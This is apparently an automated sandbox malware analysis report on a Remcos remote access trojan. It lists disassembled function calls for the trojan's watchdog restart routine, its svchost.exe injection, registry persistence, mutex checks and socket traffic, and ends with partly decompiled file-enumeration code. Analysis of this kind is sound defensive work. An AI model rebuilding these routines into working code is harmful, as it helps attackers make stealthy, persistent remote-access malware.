                                    • Part of subcall function 00402440: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024F5
                                    • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024FF
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402509
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404B78
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404B81
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404B99
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BA2
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BAB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BB4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BBD
                                  • atoi.MSVCRT ref: 00404B88
                                    • Part of subcall function 00404EA7: _EH_prolog.MSVCRT ref: 00404EAC
                                    • Part of subcall function 00404EA7: closesocket.WS2_32(?), ref: 00404EEE
                                    • Part of subcall function 00404EA7: TerminateThread.KERNEL32(?,00000001,00000000,?,00000001,00000001,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 00404F00
                                  • _CxxThrowException.MSVCRT(00000000,00000000), ref: 00404BD6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000000,0041B320,00000010,00000000,00000001,00000006), ref: 00404BDE
                                  • atoi.MSVCRT ref: 00404BE5
                                  • FindClose.KERNEL32(?), ref: 00404BF6
                                  • ExitThread.KERNEL32 ref: 00404BFE
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$G@std@@$D@2@@std@@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@Hstd@@V?$basic_string@$V10@0@$?begin@?$basic_string@D@2@@0@FindG@2@@0@V01@@$?c_str@?$basic_string@D@1@@ExceptionThrow$?length@?$basic_string@FileV10@wcscmp$?end@?$basic_string@G@1@@$?data@?$basic_string@A?$basic_string@CloseFirstH_prologNextThreadV01@atoisend$??4?$basic_string@?empty@?$basic_string@?find@?$basic_string@ExitTerminateV12@Y?$basic_string@closesocketconnectsocket
                                  • String ID:
                                  • API String ID: 338953085-0
                                  • Opcode ID: 106cf15084c160651ef456c2075b657c8e54840d3cf84fdb2eeb9ed7812cd245
                                  • Instruction ID: 4b461097a1424462df126d137943af890334f3d1b741e30b480b936ae2585c0a
                                  • Opcode Fuzzy Hash: 106cf15084c160651ef456c2075b657c8e54840d3cf84fdb2eeb9ed7812cd245
                                  • Instruction Fuzzy Hash: B4C14072800609EBCB11FFA0DC49ADE777CEB54345F0041AAF506A71A1EB745B85CF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040A5F5 Relevance: 87.7, APIs: 40, Strings: 10, Instructions: 222sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcessId.KERNEL32 ref: 0040A5FE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,00000000), ref: 0040A611
                                    • Part of subcall function 0040B829: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B836
                                    • Part of subcall function 0040B829: RegSetValueExA.ADVAPI32(?,00000004,00000000,00000004,?,00000004,00000000,?,00409CDD,80000001,00000000), ref: 0040B851
                                    • Part of subcall function 0040B829: RegCloseKey.ADVAPI32(?,?,00409CDD,80000001,00000000), ref: 0040B85C
                                  • OpenMutexA.KERNEL32 ref: 0040A63B
                                  • CloseHandle.KERNEL32(00000000), ref: 0040A64A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Remcos restarted by watchdog!,?), ref: 0040A65E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog module activated,?), ref: 0040A68C
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A69C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH,?), ref: 0040A6B6
                                    • Part of subcall function 0040B4C8: RegOpenKeyExA.KERNELBASE(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                    • Part of subcall function 0040B4C8: RegQueryValueExA.KERNELBASE(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                    • Part of subcall function 0040B4C8: RegCloseKey.KERNELBASE(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 0040A6D4
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH), ref: 0040A6E2
                                    • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                    • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                    • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                    • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                    • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                    • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                    • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                    • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                    • Part of subcall function 0040A8CE: OpenProcess.KERNEL32(00100000,00000000,?,80000001,?,0040A86F), ref: 0040A8DC
                                    • Part of subcall function 0040A8CE: WaitForSingleObject.KERNEL32(00000000,000000FF,?,0040A86F), ref: 0040A8E7
                                    • Part of subcall function 0040A8CE: CloseHandle.KERNEL32(00000000,?,0040A86F), ref: 0040A8EE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\SysWOW64,?), ref: 0040A7A3
                                  • _wgetenv.MSVCRT ref: 0040A7B3
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040A7BE
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A7C9
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A7D5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7DE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7E7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog launch failed!,?), ref: 0040A882
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?), ref: 0040A896
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A673
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A709
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040A718
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 0040A72D
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\system32,?), ref: 0040A748
                                  • _wgetenv.MSVCRT ref: 0040A758
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040A763
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A76E
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A77A
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A783
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A78C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7F0
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(\svchost.exe), ref: 0040A7FE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041BD70), ref: 0040A80C
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040A816
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog module activated,?), ref: 0040A837
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A84B
                                  • Sleep.KERNEL32(000007D0), ref: 0040A85E
                                  • CloseHandle.KERNEL32 ref: 0040A8AA
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8B6
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8BF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@$?c_str@?$basic_string@$Hstd@@V?$basic_string@$CloseG@1@@$D@2@@0@Open$HandleProcessV01@V10@0@$??4?$basic_string@G@2@@0@V01@@V10@Value_wgetenv$CreateCurrentLocalMutexObjectQuerySingleSleepTimeV10@@WaitY?$basic_string@printf
                                  • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$[ERROR]$[INFO]$\SysWOW64$\svchost.exe$\system32
                                  • API String ID: 2208868093-2207663338
                                  • Opcode ID: 9febc14696e297f8041a309c44c85142312e4adffe610cb7ea525cefc84dafa8
                                  • Instruction ID: 260755ff1fe0d3a0fcb30184a4449815193b010e4943e9dd02dd017fae915b1e
                                  • Opcode Fuzzy Hash: 9febc14696e297f8041a309c44c85142312e4adffe610cb7ea525cefc84dafa8
                                  • Instruction Fuzzy Hash: 82714272910509EFDB04BBE0EC4A9EE7B3CEF54345F404036F912A2191EB795985CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409A2F Relevance: 80.7, APIs: 42, Strings: 4, Instructions: 228processsynchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,0041BCB0,00000000), ref: 00409A49
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004166B4,?,0041BCB0,00000000), ref: 00409A5E
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,00000000), ref: 00409A77
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409A81
                                  • Process32FirstW.KERNEL32(?,?), ref: 00409A9D
                                  • Process32NextW.KERNEL32(?,0000022C), ref: 00409AAC
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00409ACC
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60 ref: 00409ADB
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AE5
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AEF
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00409B03
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B13
                                  • Process32NextW.KERNEL32(?,0000022C), ref: 00409B23
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409B3F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B48
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,?), ref: 00409B59
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B64
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B6D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B76
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,00415800), ref: 00409B88
                                  • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z.MSVCP60(?), ref: 00409BAF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BB8
                                  • CloseHandle.KERNEL32(?), ref: 00409BC1
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,00415800), ref: 00409BC8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BD7
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 00409BEB
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BF4
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(Program Files\,00000000), ref: 00409C0E
                                  • wcslen.MSVCRT ref: 00409C25
                                  • ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000), ref: 00409C31
                                  • ??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z.MSVCP60(?,?), ref: 00409C42
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409C58
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409C66
                                  • CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj), ref: 00409C75
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409C84
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00409C93
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00409CA4
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00409CAE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,00000001), ref: 00409CCC
                                  • CloseHandle.KERNEL32(00000000), ref: 00409CE5
                                    • Part of subcall function 00412B15: OpenProcess.KERNEL32(00000400,00000000,?,?,00409B9F,?), ref: 00412B2B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409CEC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409CF5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$??8std@@V?$basic_string@$?c_str@?$basic_string@D@2@@std@@D@std@@G@2@@0@$??0?$basic_string@Process32$??4?$basic_string@?begin@?$basic_string@CloseCreateG@1@@HandleNextV01@V01@@V12@$?assign@?$basic_string@?end@?$basic_string@?find@?$basic_string@?replace@?$basic_string@D@1@@FileFirstG@2@@0@0@G@2@@0@@ModuleMutexNameOpenProcessSnapshotToolhelp32V12@@wcslen
                                  • String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj
                                  • API String ID: 2459104678-694575909
                                  • Opcode ID: 03b99ce6683c0f5c76c086758dcb553c68d35851c3aac7b75cd394d2696c36c8
                                  • Instruction ID: 7a0e813b4e10dd3dd77c68d554191e2bbc423507f4273ca30df3ab345c5067a4
                                  • Opcode Fuzzy Hash: 03b99ce6683c0f5c76c086758dcb553c68d35851c3aac7b75cd394d2696c36c8
                                  • Instruction Fuzzy Hash: 2D811E7280450DEBCF04AFA0EC499EE7B78EF48355F14407AF906A70A1DB755A8ACF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410586 Relevance: 78.3, APIs: 52, Instructions: 279fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 19%
                                  			E00410586(intOrPtr* __eax, void* __eflags, void* _a8) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				void* _v16;
				char _v32;
				char _v48;
				char _v64;
				char _v80;
				char _v96;
				char _v112;
				char _v128;
				char _v144;
				void* _v160;
				char _v176;
				void* _v192;
				char _v208;
				void* _v224;
				char _v240;
				void* _v256;
				char _v272;
				struct _WIN32_FIND_DATAW _v864;
				char _v1296;
				void* _t82;
				void* _t85;
				char* _t87;
				int _t88;
				int _t90;
				char* _t92;
				int _t93;
				struct _WIN32_FIND_DATAW* _t96;
				struct _WIN32_FIND_DATAW* _t98;
				char* _t102;
				void* _t106;
				char* _t107;
				char* _t112;
				char* _t113;
				char* _t114;
				char* _t115;
				char* _t116;
				void* _t118;
				intOrPtr _t180;
				void* _t181;
				intOrPtr* _t187;
				void* _t188;
				void* _t191;
				void* _t195;

				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t180 =  *__eax;
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(__eflags,  &_v48,  &_v80, 0x41b310,  &_v80, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				_t191 = _t188 + 0x24;
				_t181 = _t180 - 0x19;
				if(_t181 == 0) {
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v10);
					L00414146();
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ( &_v64, 0x41bfb8, L"\\*");
					_t82 = FindFirstFileW( &_v864,  &_v864);
					__eflags = _t82 - 0xffffffff;
					_v16 = _t82;
					if(_t82 == 0xffffffff) {
						L15:
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
						E004020C2(0x41bf70, 0x5d,  &_v32);
						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						L16:
						_t85 = E004017DD( &_v48);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						return _t85;
					}
					_t87 =  &(_v864.cFileName);
					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t87,  &_v9, ".");
					_t187 = __imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z;
					_t88 =  *_t187(_t87);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__eflags = _t88;
					if(_t88 != 0) {
						_t98 =  &_v864;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t98, 0x250,  &_v7);
						__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t98);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					}
					_t90 = FindNextFileW(_v16,  &_v864);
					while(1) {
						__eflags = _t90;
						if(_t90 == 0) {
							goto L15;
						}
						_t92 =  &(_v864.cFileName);
						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t92,  &_v8, L"..");
						_t93 =  *_t187(_t92);
						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
						__eflags = _t93;
						if(_t93 != 0) {
							_t96 =  &_v864;
							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t96, 0x250,  &_v5);
							__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t96);
							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						}
						_t90 = FindNextFileW(_v16,  &_v864);
					}
					goto L15;
				}
				_t205 = _t181 == 1;
				if(_t181 == 1) {
					_t102 =  &_v96;
					L00414146();
					L0041414C();
					_t195 = _t191 + 0x18;
